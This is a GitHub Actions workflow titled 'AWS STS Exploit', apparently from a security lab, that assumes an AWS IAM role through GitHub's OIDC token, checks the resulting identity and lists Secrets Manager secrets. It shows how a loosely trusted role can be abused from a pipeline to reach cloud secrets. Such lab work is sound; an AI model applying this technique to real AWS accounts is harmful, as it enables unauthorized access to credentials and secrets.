name: AWS STS Exploit

on:
  push:
    branches: [ main ]
  workflow_dispatch:

jobs:
  exploit:
    runs-on: ubuntu-latest
    permissions:
      id-token: write
      contents: read
    steps:
      - name: Checkout code
        uses: actions/checkout@v3

      - name: Configure AWS credentials
        uses: aws-actions/configure-aws-credentials@v1
        with:
          role-to-assume: arn:aws:iam::067186171322:role/whitebox-lab-2-github-actions-role
          aws-region: us-east-1

      - name: Get AWS Account Information
        run: aws sts get-caller-identity

      - name: Find Secrets
        run: aws secretsmanager list-secrets
